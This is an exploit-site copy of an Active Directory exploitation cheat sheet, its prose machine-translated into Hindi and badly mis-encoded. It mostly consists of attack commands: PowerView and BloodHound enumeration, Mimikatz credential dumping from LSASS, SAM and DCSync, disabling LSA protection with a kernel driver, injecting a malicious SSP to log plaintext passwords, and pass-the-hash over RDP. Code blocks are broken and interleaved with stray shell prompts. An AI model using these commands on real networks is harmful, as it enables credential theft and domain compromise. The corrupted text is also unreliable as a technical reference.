Sploitus

Exploit Code

MARKDOWN905 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-S1CKB0Y1337-ACTIVE-DIRECTORY-EXPLOITATION-CHEAT-SHEET
# рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╢реЛрд╖рдг рдЪреАрдЯ рд╢реАрдЯ

рдпрд╣ рдЪреАрдЯ рд╢реАрдЯ рд╡рд┐рдВрдбреЛрдЬ рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХреЗ рд▓рд┐рдП рд╕рд╛рдорд╛рдиреНрдп рдЧрдгрдирд╛ рдФрд░ рд╣рдорд▓реЗ рдХреЗ рддрд░реАрдХреЗ рд╢рд╛рдорд┐рд▓ рдХрд░рддреА рд╣реИред

тД╣я╕П рдпрд╣ рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА Nikos Katsiopis рдФрд░ Nikos Vourdas рджреНрд╡рд╛рд░рд╛ рдмрдирд╛рдИ рдЧрдИ рдереАред

рдпрд╣ рдЪреАрдЯ рд╢реАрдЯ PayloadAllTheThings рд░рд┐рдкреЛ рд╕реЗ рдкреНрд░реЗрд░рд┐рдд рд╣реИред

![рдмрд╕ рдХреБрддреНрддреЗ рдХреЛ рдШреБрдорд╛рдирд╛](https://raw.githubusercontent.com/buftas/Active-Directory-Exploitation-Cheatsheet/master/WalkTheDog.png)

## рд╕рд╛рд░рд╛рдВрд╢

  * рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╢реЛрд╖рдг рдЪреАрдЯ рд╢реАрдЯ
    * рд╕рд╛рд░рд╛рдВрд╢
    * рдЙрдкрдХрд░рдг
    * рдбреЛрдореЗрди рдЧрдгрдирд╛
      * PowerView рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
      * AD рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
      * BloodHound рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
        * рд░рд┐рдореЛрдЯ BloodHound
        * рд╕рд╛рдЗрдЯ рдкрд░ BloodHound
      * Adalanche рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
        * рд░рд┐рдореЛрдЯ adalanche
      * рдЧрдгрдирд╛ рдХреА рдЧрдИ рд╡рд╕реНрддреБрдУрдВ рдХреЛ рдирд┐рд░реНрдпрд╛рдд рдХрд░реЗрдВ
      * рдЙрдкрдпреЛрдЧреА рдЧрдгрдирд╛ рдЙрдкрдХрд░рдг
    * рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐
      * рдЙрдкрдпреЛрдЧреА рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдЙрдкрдХрд░рдг
    * рдкрд╛рд░реНрд╢реНрд╡ рдЖрдВрджреЛрд▓рди
      * Powershell рд░рд┐рдореЛрдЯрд┐рдВрдЧ
      * PS рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЗ рд╕рд╛рде рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди
      * PowerShell рдореЙрдбреНрдпреВрд▓ рдЖрдпрд╛рдд рдХрд░реЗрдВ рдФрд░ рдЗрд╕рдХреЗ рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рджреВрд░рд╕реНрде рд░реВрдк рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
      * рд░рд┐рдореЛрдЯ рд╕реНрдЯреЗрдЯрдлреБрд▓ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛
      * Mimikatz
      * рд░рд┐рдореЛрдЯ рдбреЗрд╕реНрдХрдЯреЙрдк рдкреНрд░реЛрдЯреЛрдХреЙрд▓
      * URL рдлрд╝рд╛рдЗрд▓ рд╣рдорд▓реЗ
      * рдЙрдкрдпреЛрдЧреА рдЙрдкрдХрд░рдг
    * рдбреЛрдореЗрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐
      * Kerberoast
      * ASREPRoast
      * рдкрд╛рд╕рд╡рд░реНрдб рд╕реНрдкреНрд░реЗ рд╣рдорд▓рд╛
      * SPN рдХреЛ рдмрд▓рдкреВрд░реНрд╡рдХ рд╕реЗрдЯ рдХрд░реЗрдВ
      * рд╢реИрдбреЛ рдХреЙрдкреА рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
      * Mimikatz рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рдВрдЧреНрд░рд╣реАрдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдФрд░ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░реЗрдВ
      * рдЕрдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓
      * рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓
      * рд╕рдВрд╕рд╛рдзрди рдЖрдзрд╛рд░рд┐рдд рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓
      * DNSAdmins рджреБрд░реБрдкрдпреЛрдЧ
      * рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛-рдПрдХреАрдХреГрдд DNS рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
      * рдмреИрдХрдЕрдк рдСрдкрд░реЗрдЯрд░реНрд╕ рд╕рдореВрд╣ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
      * Exchange рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
      * рдкреНрд░рд┐рдВрдЯрд░ рдмрдЧ рдХреЛ рд╣рдерд┐рдпрд╛рд░ рдмрдирд╛рдирд╛
      * ACLs рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
      * mitm6 рдХреЗ рд╕рд╛рде IPv6 рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
      * SID рдЗрддрд┐рд╣рд╛рд╕ рджреБрд░реБрдкрдпреЛрдЧ
      * SharePoint рдХрд╛ рд╢реЛрд╖рдг
      * Zerologon
      * PrintNightmare
      * рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рд╕реЗрд╡рд╛рдПрдБ
      * рдХреЛрдИ PAC рдирд╣реАрдВ
    * рдбреЛрдореЗрди рд╕реНрдерд╛рдпрд┐рддреНрд╡
      * рдЧреЛрд▓реНрдбрди рдЯрд┐рдХрдЯ рд╣рдорд▓рд╛
      * DCsync рд╣рдорд▓рд╛
      * рд╕рд┐рд▓реНрд╡рд░ рдЯрд┐рдХрдЯ рд╣рдорд▓рд╛
      * рд╕реНрдХреЗрд▓реЗрдЯрди рдХреА рд╣рдорд▓рд╛
      * DSRM рджреБрд░реБрдкрдпреЛрдЧ
      * рдХрд╕реНрдЯрдо SSP
    * рдХреНрд░реЙрд╕ рдлрд╝реЙрд░реЗрд╕реНрдЯ рд╣рдорд▓реЗ
      * рдЯреНрд░рд╕реНрдЯ рдЯрд┐рдХрдЯ
      * MSSQL рд╕рд░реНрд╡рд░ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
      * рдлрд╝реЙрд░реЗрд╕реНрдЯ рдЯреНрд░рд╕реНрдЯ рддреЛрдбрд╝рдирд╛



## рдЙрдкрдХрд░рдг

  * Powersploit
  * PowerUpSQL
  * Powermad
  * Impacket
  * Mimikatz
  * Rubeus -> рд╕рдВрдХрд▓рд┐рдд рд╕рдВрд╕реНрдХрд░рдг
  * BloodHound
  * AD Module
  * ASREPRoast
  * Adalanche



## рдбреЛрдореЗрди рдЧрдгрдирд╛

### PowerView рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛

Powerview v.3.0  
Powerview Wiki

  * **рд╡рд░реНрддрдорд╛рди рдбреЛрдореЗрди рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** `Get-Domain`

  * **рдЕрдиреНрдп рдбреЛрдореЗрди рдЧрд┐рдиреЗрдВ:** `Get-Domain -Domain <DomainName>`

  * **рдбреЛрдореЗрди SID рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** `Get-DomainSID`

  * **рдбреЛрдореЗрди рдиреАрддрд┐ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** ```powershell Get-DomainPolicy

#Will show us the policy configurations of the Domain about system access or kerberos Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy

root@kitploit:~

  * **рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** ```powershell Get-DomainController Get-DomainController -Domain 

root@kitploit:~

  * **рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ:** ```powershell #Save all Domain Users to a file Get-DomainUser | Out-File -FilePath .\DomainUsers.txt

#Will return specific properties of a specific user Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List

#Enumerate user logged on a machine Get-NetLoggedon -ComputerName 

#Enumerate Session Information for a machine Get-NetSession -ComputerName 

#Enumerate domain machines of the current/specified domain where specific users are logged into Find-DomainUserLocation -Domain  | Select-Object UserName, SessionFromName

root@kitploit:~

  * **рдбреЛрдореЗрди рдХрдВрдкреНрдпреВрдЯрд░ рдЧрдгрдирд╛:** ```powershell Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName

#Enumerate Live machines Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName

root@kitploit:~




тЭЧ **рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╢рд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рде рдбреЛрдореЗрди рдПрдбрдорд┐рди рддрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ (рдкреНрд░рд┐рд╡ рдПрд╕реНрдХ):**   
рдореЗрд░реЗ рдкрд╛рд╕ рдПрдХ рдорд╢реАрди рдкрд░ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╣реБрдВрдЪ рд╣реИ -> рдПрдХ рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЙрд╕ рдорд╢реАрди рдкрд░ рдПрдХ рд╕рддреНрд░ рд░рдЦрддрд╛ рд╣реИ -> рдореИрдВ рдЙрд╕рдХрд╛ рдЯреЛрдХрди рдЪреБрд░рд╛рддрд╛ рд╣реВрдВ рдФрд░ рдЙрд╕рдХрд╛ рд░реВрдк рдзрд╛рд░рдг рдХрд░рддрд╛ рд╣реВрдВ -> рд▓рд╛рдн!

### AD рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛

  * **рд╡рд░реНрддрдорд╛рди рдбреЛрдореЗрди рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** `Get-ADDomain`

  * **рдЕрдиреНрдп рдбреЛрдореЗрди рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ:** `Get-ADDomain -Identity <Domain>`

  * **рдбреЛрдореЗрди SID рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** `Get-DomainSID`

  * **рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** ```powershell Get-ADDomainController Get-ADDomainController -Identity 

root@kitploit:~

  * **рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рдПрдВ:** ```powershell Get-ADUser -Filter * -Identity  -Properties *

#Get a specific "string" on a user's attribute Get-ADUser -Filter 'Description -like "_wtver_ "' -Properties Description | select Name, Description

root@kitploit:~

  * **рдбреЛрдореЗрди рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ:** ```powershell Get-ADComputer -Filter * -Properties * Get-ADGroup -Filter *

root@kitploit:~

  * **Enum Domain Trust:** ```powershell Get-ADTrust -Filter * Get-ADTrust -Identity 

root@kitploit:~

  * **Enum Forest Trust:** ```powershell Get-ADForest Get-ADForest -Identity 

#Domains of Forest Enumeration (Get-ADForest).Domains

root@kitploit:~

  * **Enum Local AppLocker Effective Policy:** ```powershell Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

root@kitploit:~




### BloodHound рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛

#### рд░рд┐рдореЛрдЯ BloodHound

Python BloodHound рд░рд┐рдкреЙрдЬрд╝рд┐рдЯрд░реА рдпрд╛ рдЗрд╕реЗ `pip3 install bloodhound` рд╕реЗ рдЗрдВрд╕реНрдЯреЙрд▓ рдХрд░реЗрдВ```powershell bloodhound-python -u  -p  -ns <Domain Controller's Ip> -d  -c All

root@kitploit:~
    
    
    #### рд╕рд╛рдЗрдЯ рдкрд░ BloodHound```powershell
    #Using exe ingestor
    .\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>
    
    #Using PowerShell module ingestor
    . .\SharpHound.ps1
    Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile>
    

### Adalanche рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛

#### рджреВрд░рд╕реНрде Adalanche```bash

# kali linux:

./adalanche collect activedirectory --domain    
\--username Username@Domain \--password    
\--server 

# Example:

./adalanche collect activedirectory --domain windcorp.local   
\--username some-email@example.com \--password 'password123!'   
\--server dc.windcorp.htb

## -> Terminating successfully

## Any error?:

# LDAP Result Code 200 "Network Error": x509: certificate signed by unknown authority ?

./adalanche collect activedirectory --domain windcorp.local   
\--username some-email@example.com \--password 'password123!'   
\--server dc.windcorp.htb --tlsmode NoTLS --port 389

# Invalid Credentials ?

./adalanche collect activedirectory --domain windcorp.local   
\--username some-email@example.com \--password 'password123!'   
\--server dc.windcorp.htb --tlsmode NoTLS --port 389   
\--authmode basic

# Analyze data

# go to web browser -> 127.0.0.1:8080

./adalanche analyze

root@kitploit:~
    
    
    #### рдЧрдгрдирд╛ рдХрд┐рдП рдЧрдП рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рдирд┐рд░реНрдпрд╛рдд рдХрд░реЗрдВ
    
    рдЖрдк рдХрд┐рд╕реА рднреА рдореЙрдбреНрдпреВрд▓/ cmdlet рд╕реЗ рдЧрдгрдирд╛ рдХрд┐рдП рдЧрдП рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рдХреЛ рдмрд╛рдж рдХреЗ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХреЗ рд▓рд┐рдП XML рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдирд┐рд░реНрдпрд╛рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
    
    `Export-Clixml` cmdlet рдХрд┐рд╕реА рдСрдмреНрдЬреЗрдХреНрдЯ рдпрд╛ рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рдХрд╛ Common Language Infrastructure (CLI) XML-рдЖрдзрд╛рд░рд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рддреНрд╡ рдмрдирд╛рддрд╛ рд╣реИ рдФрд░ рдЙрд╕реЗ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд░рддрд╛ рд╣реИред рдлрд┐рд░ рдЖрдк рдЙрд╕ рдлрд╝рд╛рдЗрд▓ рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЗ рдЖрдзрд╛рд░ рдкрд░ рд╕рд╣реЗрдЬреЗ рдЧрдП рдСрдмреНрдЬреЗрдХреНрдЯ рдХреЛ рдкреБрдирдГ рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП `Import-Clixml` cmdlet рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред```powershell
    # Export Domain users to xml file.
    Get-DomainUser | Export-CliXml .\DomainUsers.xml
    
    # Later, when you want to utilise them for analysis even on any other machine.
    $DomainUsers = Import-CliXml .\DomainUsers.xml
    
    # You can now apply any condition, filters, etc.
    
    $DomainUsers | select name
    
    $DomainUsers | ? {$_.name -match "User's Name"}
    

### рдЙрдкрдпреЛрдЧреА рдПрдиреНрдпреБрдорд░реЗрд╢рди рдЙрдкрдХрд░рдг

  * ldapdomaindump LDAP рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕реВрдЪрдирд╛ рдбрдВрдкрд░
  * adidnsdump рдХрд┐рд╕реА рднреА рдкреНрд░рдорд╛рдгрд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рджреНрд╡рд╛рд░рд╛ рдПрдХреАрдХреГрдд DNS рдбрдВрдкрд┐рдВрдЧ
  * ACLight рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдЦрд╛рддреЛрдВ рдХреА рдЙрдиреНрдирдд рдЦреЛрдЬ
  * ADRecon рд╡рд┐рд╕реНрддреГрдд рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдкреБрдирд░реНрдЬреНрдЮрд╛рди рдЙрдкрдХрд░рдг



## рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐

  * Windows Local Privilege Escalation Cookbook Windows рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдХреЗ рд▓рд┐рдП рдХреБрдХрдмреБрдХ

  * Juicy Potato рд╕рд┐рд╕реНрдЯрдо рдкреНрд░рддрд┐рд░реВрдкрдг рдХреЗ рд▓рд┐рдП SeImpersonate рдпрд╛ SeAssignPrimaryToken рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

тЪая╕П рдХреЗрд╡рд▓ Windows Server 2016 рдФрд░ Windows 10 рдкреИрдЪ 1803 рддрдХ рд╣реА рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ

  * Lovely Potato рд╕реНрд╡рдЪрд╛рд▓рд┐рдд Juicy Potato

тЪая╕П рдХреЗрд╡рд▓ Windows Server 2016 рдФрд░ Windows 10 рдкреИрдЪ 1803 рддрдХ рд╣реА рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ

  * PrintSpoofer рд╕рд┐рд╕реНрдЯрдо рдкреНрд░рддрд┐рд░реВрдкрдг рдХреЗ рд▓рд┐рдП PrinterBug рдХрд╛ рд╢реЛрд╖рдг

ЁЯЩП Windows Server 2019 рдФрд░ Windows 10 рдХреЗ рд▓рд┐рдП рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ

  * RoguePotato рдЙрдиреНрдирдд Juicy Potato

ЁЯЩП Windows Server 2019 рдФрд░ Windows 10 рдХреЗ рд▓рд┐рдП рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ

  * рдЯреЛрдХрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

  * SMBGhost CVE-2020-0796   
PoC

  * CVE-2021-36934 (HiveNightmare/SeriousSAM)




### рдЙрдкрдпреЛрдЧреА рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдЙрдкрдХрд░рдг

  * PowerUp рдЧрд▓рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
  * BeRoot рд╕рд╛рдорд╛рдиреНрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдПрдиреНрдпреБрдорд░реЗрд╢рди рдЙрдкрдХрд░рдг
  * Privesc рд╕рд╛рдорд╛рдиреНрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдПрдиреНрдпреБрдорд░реЗрд╢рди рдЙрдкрдХрд░рдг
  * FullPowers рд╕реЗрд╡рд╛ рдЦрд╛рддреЗ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреБрдирд░реНрд╕реНрдерд╛рдкрд┐рдд рдХрд░реЗрдВ



## рдкрд╛рд░реНрд╢реНрд╡ рдЧрддрд┐

### PowerShell рд░рд┐рдореЛрдЯрд┐рдВрдЧ```powershell

#Enable PowerShell Remoting on current Machine (Needs Admin Access) Enable-PSRemoting

#Entering or Starting a new PSSession (Needs Admin Access) $sess = New-PSSession -ComputerName  Enter-PSSession -ComputerName  OR -Sessions 

root@kitploit:~
    
    
    ### рджреВрд░рд╕реНрде рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди PS рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЗ рд╕рд╛рде```powershell
    $SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force
    $Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)
    Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}
    

### рдкрд╛рд╡рд░рд╢реЗрд▓ рдореЙрдбреНрдпреВрд▓ рдЖрдпрд╛рдд рдХрд░реЗрдВ рдФрд░ рдЗрд╕рдХреЗ рдлрд╝рдВрдХреНрд╢рди рдХреЛ рджреВрд░рд╕реНрде рд░реВрдк рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ```powershell

#Execute the command and start a session Invoke-Command -Credential $cred -ComputerName  -FilePath c:\FilePath\file.ps1 -Session $sess

#Interact with the session Enter-PSSession -Session $sess

root@kitploit:~
    
    
    ### рджреВрд░рд╕реНрде рд╕реНрдЯреЗрдЯрдлреБрд▓ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛```powershell
    #Create a new session
    $sess = New-PSSession -ComputerName <NameOfComputer>
    
    #Execute command on the session
    Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}
    
    #Check the result of the command to confirm we have an interactive session
    Invoke-Command -Session $sess -ScriptBlock {$ps}
    

### Mimikatz```powershell

#The commands are in cobalt strike format!

#Dump LSASS: mimikatz privilege::debug mimikatz token::elevate mimikatz sekurlsa::logonpasswords

#(Over) Pass The Hash mimikatz privilege::debug mimikatz sekurlsa::pth /user: /ntlm:<> /domain:

#List all available kerberos tickets in memory mimikatz sekurlsa::tickets

#Dump local Terminal Services credentials mimikatz sekurlsa::tspkg

#Dump and save LSASS in a file mimikatz sekurlsa::minidump c:\temp\lsass.dmp

#List cached MasterKeys mimikatz sekurlsa::dpapi

#List local Kerberos AES Keys mimikatz sekurlsa::ekeys

#Dump SAM Database mimikatz lsadump::sam

#Dump SECRETS Database mimikatz lsadump::secrets

#Inject and dump the Domain Controler's Credentials mimikatz privilege::debug mimikatz token::elevate mimikatz lsadump::lsa /inject

#Dump the Domain's Credentials without touching DC's LSASS and also remotely mimikatz lsadump::dcsync /domain: /all

#Dump old passwords and NTLM hashes of a user mimikatz lsadump::dcsync /user:<user> /history

#List and Dump local kerberos credentials mimikatz kerberos::list /dump

#Pass The Ticket mimikatz kerberos::ptt 

#List TS/RDP sessions mimikatz ts::sessions

#List Vault credentials mimikatz vault::list

root@kitploit:~
    
    
    :exclamation: рдХреНрдпрд╛ рд╣реЛрдЧрд╛ рдЕрдЧрд░ mimikatz LSA Protection controls рдХреЗ рдХрд╛рд░рдг credentials dump рдХрд░рдиреЗ рдореЗрдВ рд╡рд┐рдлрд▓ рд░рд╣рддрд╛ рд╣реИ ?
    
    - LSA as a Protected Process (Kernel Land Bypass)  ```powershell
      #Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
      reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
    
      #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
      #Now lets import the mimidriver.sys to the system
      mimikatz # !+
    
      #Now lets remove the protection flags from lsass.exe process
      mimikatz # !processprotect /process:lsass.exe /remove
    
      #Finally run the logonpasswords function to dump lsass
      mimikatz # sekurlsa::logonpasswords
    

  * LSA рдПрдХ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкреНрд░рдХреНрд░рд┐рдпрд╛ (рдпреВрдЬрд╝рд░рд▓реИрдВрдб "рдлрд╝рд╛рдЗрд▓рд▓реЗрд╕" рдмрд╛рдЗрдкрд╛рд╕) рдХреЗ рд░реВрдк рдореЗрдВ

    * PPLdump
    * LSA рд╕реБрд░рдХреНрд╖рд╛ рдХреЛ рдпреВрдЬрд╝рд░рд▓реИрдВрдб рдореЗрдВ рдмрд╛рдЗрдкрд╛рд╕ рдХрд░рдирд╛
  * LSA рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдЧрд╛рд░реНрдб рджреНрд╡рд╛рд░рд╛ рд╡рд░реНрдЪреБрдЕрд▓рд╛рдЗрдЬреНрдб рдкреНрд░рдХреНрд░рд┐рдпрд╛ (LSAISO) рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓ рд░рд╣рд╛ рд╣реИ ```powershell #Check if a process called lsaiso.exe exists on the running processes tasklist |findstr lsaiso

#If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data. #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides mimikatz # misc::memssp

#Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log

root@kitploit:~

  * рд╡рд┐рд╕реНрддреГрдд Mimikatz рдЧрд╛рдЗрдб

  * 2 lsass рд╕реБрд░рдХреНрд╖рд╛ рд╡рд┐рдХрд▓реНрдкреЛрдВ рдХреЗ рд╕рд╛рде рдкрдбрд╝рддрд╛рд▓




### рд░рд┐рдореЛрдЯ рдбреЗрд╕реНрдХрдЯреЙрдк рдкреНрд░реЛрдЯреЛрдХреЙрд▓

рдпрджрд┐ рдЬрд┐рд╕ рд╣реЛрд╕реНрдЯ рдкрд░ рд╣рдо рдкрд╛рд░реНрд╢реНрд╡рд┐рдХ рдЧрддрд┐ рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рдЙрд╕рдореЗрдВ "RestrictedAdmin" рд╕рдХреНрд╖рдо рд╣реИ, рддреЛ рд╣рдо RDP рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╣реИрд╢ рдкрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рд╕рд╛рджрд╛ рдкрд╛рда рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рдмрд┐рдирд╛ рдПрдХ рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рд╕рддреНрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

  * Mimikatz: ```powershell #We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag privilege::debug sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin"

#Then just click ok on the RDP dialogue and enjoy an interactive session as the user we impersonated

root@kitploit:~

  * xFreeRDP:```powershell xfreerdp +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8 /u: /pth: /v:<Hostname | IPAddress>




root@kitploit:~
    
    
